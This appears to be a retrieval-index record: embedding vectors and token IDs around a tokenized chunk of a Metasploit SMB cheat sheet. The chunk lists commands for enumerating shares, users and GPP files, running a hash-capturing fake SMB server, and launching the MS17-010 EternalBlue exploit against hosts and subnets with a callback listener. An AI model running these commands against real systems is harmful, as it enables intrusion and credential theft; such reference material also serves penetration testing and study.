-0.2726651430130005, -0.32924196124076843, -0.03328276425600052, -0.2620690166950226, -0.5570308566093445, 0.9436459541320801, 0.48382803797721863, -0.553719162940979, -0.01244822796434164, 0.3419540822505951, 0.2343277782201767, -0.21934208273887634, -0.5489040017127991, -0.7058560848236084, -0.24142231047153473, -0.517278790473938, -0.4165763258934021, 0.8582001328468323, -0.35677194595336914, -0.2837865352630615, 0.13609431684017181, -0.6225254535675049, -1.1173968315124512, 0.1925523579120636, -0.5246067643165588, -0.556627094745636, 0.5955987572669983, 0.2186242789030075, -0.061100706458091736, 0.03984734043478966, -0.3285290002822876, -0.27255719900131226, 0.2437436878681183, 0.8847839832305908, 0.07549307495355606, 0.615833580493927, 0.027428526431322098, -0.4285547435283661, 0.5002316832542419, 0.02982555702328682, 0.9070789813995361, 0.13244009017944336, -0.06537068635225296, -0.4381261169910431, -0.2588033974170685, -0.9495156407356262, -0.5657321810722351, -0.09028061479330063, -0.0605916753411293, 0.4335012435913086, -0.4088578224182129, -0.936821460723877, -0.36888816952705383, -0.1408229023218155, -0.47379180788993835, 0.35005050897598267, 0.6633827686309814, 0.8057689070701599, -0.04818032681941986, 0.21076160669326782, -1.293160319328308, 4.39715051651001, 0.4618236720561981, 0.20824213325977325, 0.17085431516170502, 0.4578046202659607, 0.8821333646774292, 1.102669596672058, -0.5428817272186279, 0.11531241983175278, -0.7160917520523071, 0.5047962665557861, 0.04144684225320816, 0.7804039120674133, 0.3933955132961273, 0.5996857285499573, 0.7124636173248291, -0.5799996852874756, 0.4843893051147461, 0.835261881351471, -0.6758497953414917, -1.0220286846160889, 0.06613916158676147, -0.49703550338745117, 0.8581575751304626, 0.48278769850730896, 0.6101728677749634, -0.2144218236207962, -0.3490448296070099, -0.2266797125339508, -0.6080031394958496, 0.6398090124130249, -0.742209792137146, 0.09430509805679321, -0.011692539788782597, -0.4547377824783325, 0.10437364876270294, 0.1058422178030014, -0.5418939590454102, -0.15923361480236053, -0.33763429522514343, -0.11588984727859497, 0.26487305760383606, -0.16852977871894836, -0.530403196811676, 0.10072361677885056, 0.6624899506568909, -0.14223812520503998, 0.0907134860754013, 0.8957492709159851, -0.4781339764595032, 0.5652801394462585, 0.8970547318458557, 0.8464685678482056, 0.6097970008850098, -0.43965834379196167, -0.27164867520332336, 0.4249919354915619, -0.5359848141670227, 0.14711366593837738, -0.1516382396221161, 0.7422106266021729, -0.25227048993110657, -0.26876339316368103, 0.6628578305244446, -1.1052993535995483, -0.13415153324604034, -0.43757539987564087, -0.14365796744823456, -0.151458740234375, -0.4423551559448242, -0.5440126657485962, 0.5048764944076538, 0.018562817946076393, -0.14882385730743408, 0.44351357221603394, -0.371780663728714, -0.5461180806159973, 0.018450604751706123, 1.1079554557800293, -0.10445480048656464, -0.25385385751724243, -1.1190334558486938, -0.987514078617096, 0.19280774891376495, 0.893562376499176, 0.8397454619407654, -0.2742669880390167, -0.8167135715484619, -0.13038413226604462, 0.3848629593849182, 0.5354282259941101, 0.05094816908240318, -0.4803193211555481, 0.09939344227313995, 0.36236464977264404 ]
[ 101, 15488, 2497, 2147, 12314, 4757, 14905, 1006, 8241, 4471, 5991, 1007, 1010, 2003, 1037, 2126, 2005, 6631, 6764, 2408, 14164, 2006, 1037, 2897, 1012, 2045, 2024, 2048, 2364, 8831, 2005, 15488, 2497, 1024, 16621, 1013, 22975, 2361, 1011, 3322, 7513, 7528, 15488, 2497, 2006, 2327, 1997, 2037, 4493, 5658, 26282, 2015, 2897, 4294, 1010, 2029, 3039, 2005, 3645, 7588, 2000, 10639, 2408, 1996, 2168, 2897, 22932, 2629, 1013, 22975, 2361, 1011, 10947, 4617, 1997, 15488, 2497, 2224, 2023, 3417, 1010, 2020, 5658, 26282, 2015, 2003, 2025, 2109, 1012, 2060, 18444, 2000, 2022, 5204, 1997, 1024, 15488, 2497, 1011, 14262, 2121, 4471, 5991, 6895, 10343, 1011, 2691, 4274, 5371, 3001, 3286, 3676, 1011, 1037, 2489, 4007, 2128, 1011, 7375, 1997, 15488, 2497, 1010, 2029, 2003, 4703, 2179, 2006, 19998, 1011, 2066, 3001, 11368, 3022, 24759, 28100, 2038, 2490, 2005, 3674, 15488, 2497, 14184, 1010, 2164, 1024, 2544, 4372, 17897, 8156, 6299, 11787, 1013, 26128, 29278, 6129, 22496, 17695, 11244, 14184, 16570, 4710, 14184, 8873, 2571, 4651, 10288, 24759, 28100, 14184, 12399, 2063, 2024, 2062, 14184, 2084, 3205, 2182, 1010, 2005, 1996, 2440, 2862, 1997, 14184, 2448, 1996, 3945, 3094, 2306, 5796, 11329, 5644, 9890, 1024, 5796, 2546, 2575, 1028, 3945, 2026, 2015, 4160, 2140, 6845, 4044, 2860, 10222, 5604, 1999, 1037, 6845, 4044, 1011, 15488, 2497, 2064, 2022, 2109, 2006, 1037, 3332, 1521, 1055, 3677, 3698, 1010, 2030, 2306, 8946, 2121, 1012, 2005, 6013, 2770, 29086, 2006, 1057, 8569, 3372, 2226, 2385, 1012, 5840, 1024, 8946, 2121, 2448, 1011, 2009, 1011, 1011, 28549, 1011, 1011, 10172, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 16621, 1024, 16621, 1011, 1011, 10172, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 4008, 2629, 1024, 4008, 2629, 1057, 8569, 3372, 2226, 1024, 2385, 1012, 5840, 1013, 8026, 1013, 24234, 12395, 4305, 2099, 1011, 1052, 1013, 1056, 8737, 1013, 29379, 26794, 10651, 26794, 16500, 1011, 1061, 29086, 20410, 2075, 2544, 2003, 2004, 3517, 1024, 1002, 29086, 1011, 1011, 2544, 2544, 1018, 1012, 1017, 1012, 2340, 1011, 1057, 8569, 3372, 2226, 9530, 8873, 27390, 2075, 1996, 3745, 1024, 4937, 1026, 1026, 1041, 11253, 1028, 1028, 1013, 4385, 1013, 29086, 1013, 15488, 2497, 1012, 9530, 2546, 1031, 29379, 1035, 3745, 1033, 7615, 1027, 29379, 29086, 3745, 4130, 1027, 1013, 1056, 8737, 1013, 29379, 3191, 2069, 1027, 2053, 11347, 3085, 1027, 2748, 1041, 11253, 23818, 1996, 2326, 1024, 2326, 15488, 2497, 2094, 23818, 15488, 2497, 4372, 17897, 8156, 2368, 17897, 11657, 15488, 2497, 2544, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 2544, 2448, 15488, 2497, 1024, 1013, 1013, 2184, 1012, 2184, 1012, 2184, 1012, 17365, 4372, 17897, 11657, 6661, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 4372, 18163, 8167, 2229, 2448, 15488, 2497, 1024, 1013, 1013, 2184, 1012, 2184, 1012, 2184, 1012, 17365, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 17365, 2448, 1005, 15488, 2497, 1024, 1013, 1013, 5884, 1025, 5310, 2007, 7258, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 1018, 1005, 15488, 2497, 1024, 1024, 2467, 2368, 26775 ]
metasploit
11.txt
0
##ypt = false smb : : protocolversion = 1 enumerate shares and show all files recursively : use auxiliary / scanner / smb / smb _ enumshares run'smb : / / user : pass with a space @ 10. 10. 10. 161'showfiles = true spidershares = true enumerate users : use auxiliary / scanner / smb / smb _ enumusers run smb : / / user : p4 $ $ w0rd @ 192. 168. 123. 13 enumerate gpp files in a smb share : use auxiliary / scanner / smb / smb _ enum _ gpp run smb : / / 192. 168. 123. 13 / share _ name verbose = true store = true run smb : / / user : p4 $ $ w0rd @ 192. 168. 123. 13 / share _ name verbose = true store = true smb servercreate a mock smb server which accepts credentials before returning nt _ status _ logon _ failure. these hashes can then be cracked later : use auxiliary / server / capture / smb run smb ms17 - 010metasploit has a module for ms17 - 010, dubbed eternal blue, which has the capability to target windows 7, windows 8. 1, windows 2012 r2, and windows 10. checking for exploitability : use auxiliary / scanner / smb / smb _ ms17 _ 010 check 10. 10. 10. 23 check 10. 10. 10. 0 / 24 check smb : / / user : pass @ 10. 10. 10. 1 / check smb : / / domain ; user : pass @ 10. 10. 10. 1 / check cidr : / 24 : smb : / / user : pass @ 10. 10. 10. 0 threads = 32 as of 2021, metasploit supports a single exploit module for which has the capability to target windows 7, windows 8. 1, windows 2012 r2, and windows 10, full details within the metasploit wrapup : use exploit / windows / smb / ms17 _ 010 _ eternalblue run 10. 10. 10. 23 lhost = 192. 168. 123. 1 run 10. 10. 10. 0 / 24 lhost = 192. 168. 123. 1 lport = 5000 run smb : / / user : pass
[ 0.530501663684845, -0.7113302946090698, 0.015282250940799713, 0.9573585987091064, 0.22283761203289032, 0.07811401039361954, -0.7628530263900757, 0.3194694519042969, 0.6693738102912903, 0.263162761926651, -0.07511966675519943, -0.12233462929725647, 0.38856223225593567, -0.32171696424484253, -0.37573298811912537, -0.08610698580741882, 0.015343114733695984, -0.6220868229866028, -1.548561930656433, -0.339579701423645, -0.06578094512224197, -0.2150593400001526, -0.6503658294677734, -0.7909464836120605, -0.35953640937805176, 0.4006769359111786, 0.7798067331314087, -0.2751733362674713, 0.36126333475112915, 0.3447507619857788, 0.446377694606781, -0.3707387447357178, 0.11730074137449265, -0.6856353878974915, 0.22336718440055847, 0.07982507348060608, 0.9838889241218567, -0.29148706793785095, 0.507779598236084, -0.6239235997200012, 0.09206884354352951, -0.47456100583076477, 0.31063956022262573, -0.45282191038131714, -0.14067301154136658, -0.5180524587631226, 0.26798591017723083, -0.1179804876446724, 1.1209527254104614, -0.1137535348534584, 0.518351137638092, 0.2261909544467926, -0.014922646805644035, 0.5096467137336731, 0.16551484167575836, 0.12467994540929794, -0.09862574189901352, 0.1682736724615097, -0.324359267950058, 0.09041401743888855, 0.16719552874565125, 0.434235543012619, 0.7706897854804993, -0.9357438087463379, 0.08961054682731628, 0.12600068747997284, 0.12656012177467346, -0.37404337525367737, -0.2624932825565338, -0.7057228684425354, 0.11376488953828812, 0.8030648231506348, -0.981269359588623, -0.21106712520122528, -0.6846898794174194, 0.2500278949737549, 0.13008974492549896, -0.10410431027412415, -0.5936957597732544, 0.6417880058288574, -0.19846518337726593, 0.454693078994751, 1.0263367891311646, -0.20951810479164124, -0.5479122996330261, -0.41030123829841614, 0.3296976387500763, 0.5126783847808838, -0.43137064576148987, 0.2591153085231781, 0.4613041877746582, 0.3589121103286743, -0.37021729350090027, -0.34101247787475586, 0.12734347581863403, 0.32776939868927, -0.9373214244842529, 0.09430144727230072, 0.5589810609817505, -0.16603900492191315, 0.6848388910293579, 0.754828929901123, 0.2787213623523712, 0.40229329466819763, -0.592596173286438, 0.512510359287262, 0.5541201233863831, -0.07316034287214279, -0.36013323068618774, -0.42947158217430115, 0.40214455127716064, -0.24090056121349335, -0.06254782527685165, -0.3839561343193054, -0.09625448286533356, -0.004527011886239052, 0.32868438959121704, -0.1381232738494873, -0.5472933650016785, 1.062972903251648, -0.4139160215854645, -0.42471739649772644, 0.3810212016105652, -0.2701565623283386, 0.31108012795448303, 0.2499484270811081, -0.057006675750017166, 0.7142365574836731, -0.7686495184898376, -0.5299909710884094, -0.16459976136684418, 0.05890173465013504, 0.052366841584444046, 0.689542829990387, 0.19643288850784302, 0.2931573688983917, 0.015963664278388023, 0.33160942792892456, 0.9596148729324341, -0.5886784195899963, 0.15925998985767365, 0.335420697927475, 0.29193171858787537, 1.4104188680648804, 0.1235978901386261, -0.0617641881108284, -0.20715245604515076, 0.16323605179786682, -0.359914094209671, 0.3237512707710266, -0.18367043137550354, -0.09553779661655426, 0.41398993134498596, -0.3874536156654358, -0.23721197247505188, 0.5608858466148376, -0.41713380813598633, 0.3622366487979889, -0.7093848586082458, 0.028564177453517914, -0.2901344299316406, 1.2922435998916626, 0.02141760289669037, 0.5940065383911133, 0.04993487894535065, 0.29282307624816895, -0.5498164296150208, -0.48510685563087463, -0.5956137180328369, 0.14623646438121796, -0.03553737699985504, 0.012692206539213657, 0.06216837465763092, 0.0035227537155151367, 1.2679144144058228, 0.6128597259521484, -0.40443500876426697, -0.07451579719781876, 0.3196614980697632, 0.06741365790367126, -0.8784005641937256, 0.08433680981397629, 0.36186984181404114, 0.9265328645706177, -0.12945596873760223, 0.06324191391468048, 0.07061298936605453, -0.5426584482192993, -0.5556163787841797, -0.3758358955383301, -0.10614878684282303, 0.42078524827957153, -0.21589532494544983, 0.17757566273212433, 0.6519964933395386, 0.14655864238739014, -1.1339921951293945, -0.48019954562187195, 0.10653182119131088, -1.0694397687911987, -0.4408668875694275, 0.11305272579193115, -0.20772433280944824, 0.3997923731803894, -0.6157486438751221, -0.43712756037712097, 0.6710102558135986, 1.0321404933929443, -0.13228437304496765, 0.615452229976654, 1.1120253801345825, 0.058942899107933044, -0.48077407479286194, -0.3027336001396179, 0.0054524140432477, -0.3232475221157074, -0.3209546208381653, 0.5042664408683777, 0.12978321313858032, 0.04017430916428566, -0.06200634315609932, 0.6298641562461853, 0.45234569907188416, -0.020964644849300385, -0.06457629054784775, -0.508317768573761, 0.049711570143699646, 0.37770599126815796, -0.7327269315719604, 0.24708329141139984, -0.26673322916030884, 0.3716740012168884, 0.2641400694847107, 1.0346556901931763, 0.12747633457183838, -0.4846881330013275, 0.5245721936225891, 0.03499843180179596, 0.18320418894290924, -0.3971025347709656, 0.3423396348953247, 0.8986284136772156, 0.6720084547996521, 1.0184799432754517, 0.6533307433128357, 0.6327818632125854, -0.0845772922039032, -0.09374389797449112, -0.3974834978580475, 0.11614757776260376, 0.17953206598758698, 0.742379903793335, -0.16421321034431458, 0.015615333802998066, -0.7370341420173645, -0.35199031233787537, 0.31818822026252747, 0.3205460011959076, -0.8398358821868896, -1.17434823513031, -0.15248775482177734, -0.4492579698562622, -0.886738121509552, -0.4668304920196533, 0.5247824788093567, -0.019522763788700104, -0.39849308133125305, 0.0849025622010231, 0.06446980684995651, -0.6014630794525146, -0.584789514541626, -0.008874041959643364, -0.9838306307792664, -1.0403375625610352, -0.47415465116500854, 0.009573728777468204, 0.09096263349056244, 0.07779327780008316, 0.7278690338134766, -0.19225838780403137, -0.7126893997192383, 0.16370069980621338, 0.46157124638557434, 0.7313933968544006, -0.05103890597820282, -0.18044626712799072, -0.8035510182380676, 0.04550246521830559, 0.15372183918952942, 0.4616413116455078, -0.3702705502510071, -0.11199312657117844, -0.32453224062919617, -0.3317358195781708, -0.14080247282981873, 0.10166115313768387, 0.9428581595420837, -0.23629650473594666, 0.4720432758331299, -0.478031724691391, 0.03086126782000065, -0.19266054034233093, 0.2527892291545868, -0.36448830366134644, -0.3252090513706207, 0.5776940584182739, -0.4330017566680908, -0.05684531852602959, 0.4794345200061798, 1.033026099205017, -0.5316538214683533, 0.43318456411361694, -0.26700809597969055, 0.584611713886261, -0.5849236249923706, 0.9280925393104553, 0.2977234721183777, 0.3257511556148529, 0.32234376668930054, -0.2046850472688675, 0.3523913621902466, -0.709000289440155, -0.10082625597715378, -0.6586844325065613, -0.3954787254333496, 0.49170196056365967, 0.3734458386898041, -0.8066636323928833, 0.3184831440448761, -0.15690970420837402, -0.018043041229248047, -0.101882703602314, -0.7010310292243958, 0.950366735458374, 0.3002801239490509, 0.15822918713092804, -0.3565678298473358, -0.5170032978057861, 0.44046300649642944, 0.04568544402718544, 0.44167715311050415, -0.3301582634449005, 0.2633439302444458, 0.4522964060306549, -0.5705969333648682, 0.49572986364364624, 0.3268398344516754, -0.06344949454069138, -0.24010257422924042, -0.3339025378227234, -0.35033121705055237, -0.09722598642110825, 0.5858697891235352, 0.21500316262245178, -0.33230653405189514, 0.20894217491149902, -0.5927855372428894, 0.36611229181289673, 0.37861788272857666, 0.41681796312332153, 0.38314685225486755, 0.042899660766124725, -0.05115235224366188, 0.19532234966754913, -0.29984718561172485, -0.6354981660842896, 0.2325621396303177, 0.06328704208135605, 0.2208084911108017, -0.38588398694992065, 0.9893864393234253, -0.2808328866958618, -0.013797561638057232, 0.6393534541130066, -0.12506873905658722, -1.1006734371185303, 0.2479063719511032, -0.05134765803813934, 0.4737459123134613, -0.29798993468284607, 0.04218161851167679, 0.250667005777359, 0.3658013939857483, 0.0891934484243393, -0.1471184343099594, 0.07559910416603088, -0.21800169348716736, -0.6136103868484497, -0.048336148262023926, -0.4353269040584564, -0.1303870677947998, -0.2238001823425293, 0.27328160405158997, 0.04999420791864395, -0.3258568048477173, -0.4774623215198517, 0.638261616230011, 0.9331964254379272, 0.7061640024185181, 0.3882179260253906, 0.35625869035720825, -0.3507830798625946, -0.1286030411720276, 0.31042757630348206, -0.3764585256576538, 0.5146670937538147, 0.16522277891635895, 0.827004611492157, -0.01961292326450348, 0.0918792188167572, -0.6263344883918762, -0.145058736205101, -0.1209125816822052, 0.08813466131687164, 0.04730961099267006, 0.2571679949760437, -0.4605100452899933, -0.5925519466400146, 0.09070021659135818, 0.038236215710639954, -0.7163683176040649, -0.25002333521842957, -0.15700800716876984, 0.8681148886680603, 0.17017780244350433, -0.7563881278038025, -0.14820446074008942, -0.7296683192253113, 0.4288833439350128, 0.1046178936958313, -0.29165366291999817, 0.21061240136623383, -0.7251697778701782, -0.23950763046741486, -0.40396347641944885, 0.43103861808776855, 0.06881256401538849, -0.1503378450870514, -0.3377958834171295, -0.844549834728241, -0.3000791668891907, 0.3860468566417694, -0.5404127836227417, -0.9679619669914246, 0.06654831767082214, 0.3794024586677551, 0.5190078616142273, 0.21315179765224457, -0.1464191973209381, -0.46364232897758484, -0.041011277586221695, -0.19665837287902832, 0.513058066368103, -1.1451101303100586, -0.17155663669109344, 1.070197343826294, -0.29244428873062134, -0.4655260741710663, 0.12031874805688858, -0.4746663570404053, -0.14267508685588837, -0.3134816586971283, 0.3438616394996643, -0.28092020750045776, -0.14582869410514832, 0.637638509273529, 0.21804769337177277, -0.41140106320381165, 0.39540401101112366, 0.7711002230644226, -0.30620715022087097, 0.4880811274051666, 0.11735408008098602, -0.3690657913684845, 0.49859780073165894, -0.9393758773803711, 0.421766996383667, 0.16836601495742798, 0.35231131315231323, 0.020103316754102707, -0.5218355655670166, 0.5951732397079468, 0.09868084639310837, 0.1937720626592636, -0.8245737552642822, -0.5011427402496338, 0.09998062998056412, 0.800878643989563, 0.22663241624832153, 0.24416625499725342, 0.24285432696342468, 0.03923941031098366, 0.882400631904602, -0.24701736867427826, -0.29158204793930054, -0.5472535490989685, 0.023754779249429703, 0.046496372669935226, 0.3179304003715515, -0.3344915807247162, 0.025816895067691803, -0.5607854127883911, -0.6673532724380493, 0.3586955964565277, -0.34676310420036316, 0.026144713163375854, -0.8690464496612549, -0.18870605528354645, -1.0747426748275757, 0.22300203144550323, -0.3474387526512146, 0.1295020580291748, -0.021956685930490494, 0.2085840255022049, -0.07005034387111664, 0.3397385776042938, 0.14499744772911072, -0.19147659838199615, 0.07325039803981781, 0.586772620677948, -0.20760540664196014, -0.9679539203643799, -0.2826986014842987, 0.18440386652946472, -0.6775897741317749, -0.10567226260900497, 0.18307800590991974, -0.26234519481658936, -0.6877058148384094, -1.048624038696289, 0.023784345015883446, -0.2960289418697357, 0.002738765673711896, -0.31838539242744446, -0.6146023273468018, -0.48226046562194824, -0.08874308317899704, 0.27477777004241943, -0.7655751705169678, 0.17083202302455902, -0.04748709872364998, -0.2931171655654907, 0.17452530562877655, 0.009252921678125858, -0.5645745992660522, -1.0460031032562256, -0.4247627854347229, 1.0367136001586914, -0.07340508699417114, 0.08503654599189758, -0.23009532690048218, 0.07501016557216644, 0.5615248680114746, 0.2845185399055481, -0.6484212875366211, -0.7075961232185364, -0.4671545922756195, -0.248221293091774, 0.006927323527634144, 0.20283667743206024, -0.48093411326408386, 0.37919703125953674, 0.1695387363433838, 0.2726854085922241, -0.11707056313753128, -0.21148066222667694, -0.2607090473175049, -0.10775339603424072, 0.9429031014442444, -0.2746042311191559, 0.1967279464006424, 0.349771648645401, 0.9391815662384033, 0.07304804027080536, -0.11313103884458542, -0.26077213883399963, 0.03603556379675865, -0.28852710127830505, -0.9702580571174622, 1.129049301147461, 0.3541986644268036, -0.40045303106307983, 0.3183572292327881, -0.04718143120408058, 0.44105634093284607, -0.041778650134801865, -0.0501687154173851, 0.9176653027534485, 0.3346255421638489, -0.12055378407239914, -0.7412542700767517, 0.23384277522563934, 0.4262559711933136, 0.40848544239997864, 0.49418550729751587, -0.5034475326538086, -0.4497408866882324, -0.21928520500659943, -0.3220903277397156, -0.241416335105896, -0.39509591460227966, -1.0134836435317993, 0.4730907380580902, -0.3285134434700012, 0.7264763116836548, -0.9718676805496216, -0.9823640584945679, -0.07101250439882278, 0.11831164360046387, 0.0787356048822403, -0.8556160926818848, 0.44548168778419495, 0.3684528172016144, 0.5145575404167175, -0.5968398451805115, 0.3575688600540161, -0.7206835746765137, 0.17857009172439575, 0.7568820714950562, -0.4253901243209839, -0.5676704049110413, 1.2588428258895874, 0.5523899793624878, -1.3308440446853638, -0.4329818785190582, -0.7630984783172607, -0.297578364610672, 0.06924913823604584, -0.15928128361701965, -0.5923396944999695, 0.026523467153310776, 0.1487397849559784, -0.45190170407295227, 0.616788923740387, 0.2014673501253128, -0.2031867802143097, -0.9813449382781982, 0.4768242835998535, -0.051828380674123764, 0.3565925359725952, 0.6293864846229553, -0.43949249386787415, -0.43905937671661377, -0.3910037875175476, -0.2967362105846405, 0.11396287381649017, 0.15342088043689728, 0.7433436512947083, -0.2600126564502716, 0.2966076731681824, 0.06242488697171211, -0.23181679844856262, 0.91563481092453, 0.2541949152946472, 0.5291664004325867, 0.2502756416797638, 0.40958958864212036, -0.7060593962669373, -0.562970757484436, -0.1615174561738968, 0.22717371582984924, 0.3658263683319092, -0.42775753140449524, -0.26257187128067017, 0.001398876658640802, -0.15004444122314453, -0.056846801191568375, -1.2121328115463257, -0.9696395397186279, -0.7917024493217468, -0.21587523818016052, -0.08963609486818314, 0.13769188523292542, 0.31181755661964417, 0.08936692029237747, -0.2604534327983856, -0.25489020347595215, -0.8468798995018005, -0.0464874804019928, -0.23981373012065887, -0.047425609081983566, -0.2967391312122345, -0.03896426409482956, -0.5860702991485596, -0.3899480402469635, -0.1972038745880127, -0.163535475730896, -0.4654192626476288, -0.690176248550415, -0.5090793967247009, 0.33370068669319153, -0.10157494246959686, 0.33402541279792786, -0.3927529752254486, -0.4425981640815735, 0.35552579164505005, -0.54595547914505, 0.1795293092727661, 0.7671179175376892, -0.7576332092285156, 0.7400792241096497, 0.1818189024925232, -0.30304497480392456, 0.3364279866218567, -0.6366695761680603, 0.07841652631759644, -0.0027516221161931753, -0.26732537150382996, 0.496597021818161, 0.7204654216766357, -0.6747685670852661, -0.10107073932886124, 0.07468689978122711, -0.47665682435035706, -0.4390380084514618, -0.13145938515663147, -0.05877230316400528, -0.1735823154449463, -0.20778898894786835, 0.15391960740089417, 0.8896926045417786, 0.0430084764957428, 0.3112161457538605, -0.9342865943908691, 0.6917458772659302, 0.386310338973999, 0.42528006434440613, 0.14302091300487518, 0.5433012843132019, -0.13137131929397583, -0.18929153680801392, 0.0014431215822696686, 0.31917452812194824, -0.3709886372089386, 0.46097075939178467, 0.4087889790534973, 0.09810613095760345, 0.027854477986693382, -0.46633535623550415, 0.38596025109291077, 0.5194374918937683, 0.5742756724357605, 0.15578901767730713, 0.49005377292633057, -0.7687358260154724, -0.5874804258346558, -0.3283098638057709, -0.7685466408729553, 0.21880881488323212, 0.03493081405758858, -0.5361679792404175, -0.09200252592563629, -0.19349238276481628, -0.39846426248550415, 0.45193755626678467, 0.28433704376220703, -0.11784297227859497, 0.7024596929550171, -0.42443040013313293, -0.09046076983213425, 1.118633508682251, -0.6279985308647156, -0.8104830384254456, -0.32971101999282837, 0.04748660698533058, -0.9581549167633057, -0.7328596711158752, -0.14156536757946014, 0.3812689185142517, 0.0044503845274448395, 0.27490222454071045, -0.424283891916275, 0.3764175772666931, 0.059054791927337646, -0.12453214824199677, -0.47503572702407837, 0.28785741329193115, -0.41172829270362854, 0.20946241915225983, -0.14481894671916962, -0.4802459478378296, -0.14834700524806976, -0.20770412683486938, -0.13312356173992157, -0.131096750497818, -0.3436444401741028, 0.6513564586639404, 0.22710281610488892, 0.01183657068759203, 0.600628137588501, 0.7999440431594849, 0.6013398766517639, -0.08811450749635696, 0.17169520258903503, -0.49827712774276733, 0.27517274022102356, 0.24498307704925537, 0.8946629166603088, 0.30283233523368835, 0.4640031158924103, 0.2712973654270172, -0.5041558146476746, -0.2289910763502121, 0.5467135906219482, -0.503603458404541, -0.6341801285743713, 0.07032996416091919, -0.44999223947525024, 0.22486115992069244, 0.09579349309206009, -0.11112481355667114, 0.040251538157463074, 0.4071309566497803, 0.24259251356124878, 0.6216972470283508, 0.17118903994560242, 0.672207236289978, -0.795179009437561, 0.30602550506591797, 0.008399508893489838, 0.19124558568000793, -0.05102768912911415, 0.22424016892910004, -0.8622634410858154, 0.24465370178222656, 0.8059527277946472, 0.2881857454776764, -0.5304993987083435, 0.6427584886550903, -0.5555859208106995, 0.5020904541015625, 0.25070682168006897, 0.10658253729343414, -0.7362135648727417, 0.18309244513511658, -0.01358529832214117, -0.5424978137016296, -0.5894582867622375, -0.27281391620635986, -0.08100932836532593, 0.4781363606452942, 0.49107444286346436, -0.024229232221841812, -0.19327107071876526, -0.6921887397766113, 0.4041227400302887, -0.6602887511253357, 0.2128547579050064, 0.6494492292404175, -0.16263152658939362, -0.14523711800575256, 0.7214852571487427, 0.715613842010498, 0.8677113652229309, 0.12896983325481415, 1.2064040899276733, 0.15320055186748505, 0.3346704840660095, 0.6201300621032715, -0.09435863792896271, -0.30306506156921387, 0.39253461360931396, -0.4962977170944214, -0.4310510754585266, 0.12911781668663025, -0.452046275138855, 1.1277997493743896, 0.13373418152332306, -0.6398568153381348, -0.23696722090244293, 0.22201786935329437, -0.5950940847396851, -0.5241325497627258, 0.6753420829772949, 0.1378984898328781, -0.39276570081710815, -0.06345247477293015, 0.37044811248779297, 0.5738502144813538, 0.20019125938415527, -0.47761186957359314, -1.3772977590560913, -0.27467724680900574, -0.1650247871875763, -0.03139958903193474, 0.7857208251953125, -0.22494842112064362, 0.2301178276538849, -0.20547476410865784, -0.8166167140007019, -0.7417906522750854, 0.15964876115322113, -0.4443102777004242, -0.5071167349815369, 0.32260867953300476, 0.31165412068367004, 0.37609750032424927, 0.31849706172943115, -0.2871719300746918, -0.6366483569145203, 0.1813727617263794, 0.9247972369194031, 0.07237398624420166, 0.446178674697876, 0.25833767652511597, 0.008148949593305588, 0.31492358446121216, -0.16544026136398315, 0.5162209868431091, 0.009363817982375622, -0.03325401991605759, -0.09985910356044769, -0.15493756532669067, -0.9383940100669861, -0.33122652769088745, -0.35237643122673035, 0.07725434750318527, 0.8184025287628174, -0.08898796141147614, -1.324409008026123, -0.4872448742389679, -0.16874100267887115, -0.1449710577726364, -0.03806137293577194, 0.09070462733507156, 0.8855817914009094, -0.0903225764632225, 0.1302056908607483, -1.0455937385559082, 4.448317527770996, 0.49807679653167725, -0.3054471015930176, 0.20813152194023132, 0.33352842926979065, 0.7368290424346924, 1.2662423849105835, -0.7557159662246704, 0.38647356629371643, -0.09136149287223816, 0.6424129605293274, 0.04774598032236099, 0.4664980173110962, 0.4373228847980499, 0.6894096732139587, 0.17584192752838135, -0.588716983795166, 0.3947007656097412, 0.4665886163711548, -0.9867469072341919, -0.5102592706680298, 0.08293464779853821, -0.9183464646339417, 0.7474250793457031, 0.737320601940155, 0.46609053015708923, 0.15241913497447968, -0.9125308394432068, -0.14314362406730652, -0.44774264097213745, 0.32620540261268616, -0.39449697732925415, 0.22878138720989227, 0.06349600851535797, -0.4019438624382019, 0.028280017897486687, 0.26943132281303406, -0.6615256667137146, -0.44233840703964233, -0.4318523108959198, 0.10318289697170258, 0.2858488857746124, 0.16665019094944, -0.7495875954627991, -0.15437456965446472, 0.6653095483779907, -0.49184855818748474, 0.11330854892730713, 0.8929477334022522, -0.84349125623703, 0.842115044593811, 0.5691403150558472, 0.4134388864040375, 0.4674008786678314, -0.6562944054603577, 0.22490711510181427, 0.09139727801084518, -0.4213109612464905, 0.4110095798969269, 0.024779468774795532, 0.9867978692054749, -0.07463282346725464, 0.27581146359443665, 0.05219656229019165, -0.717099666595459, 0.6181265115737915, -0.23937520384788513, -0.2493799775838852, -0.15516425669193268, -0.5203092098236084, 0.013937262818217278, -0.3602658212184906, -0.308411180973053, -0.1466052532196045, 0.7501633167266846, -0.18012051284313202, -0.3599831163883209, -0.0714421272277832, 0.4968412220478058, 0.1319754421710968, -0.16469262540340424, -0.882109522819519, -0.966029703617096, 0.6222355961799622, 0.6419055461883545, 0.8717535734176636, 0.19691310822963715, -0.9739571809768677, -0.20213325321674347, -0.036162927746772766, 0.48096635937690735, 0.1630735695362091, -0.43853265047073364, 0.550857663154602, 0.4335983693599701 ]
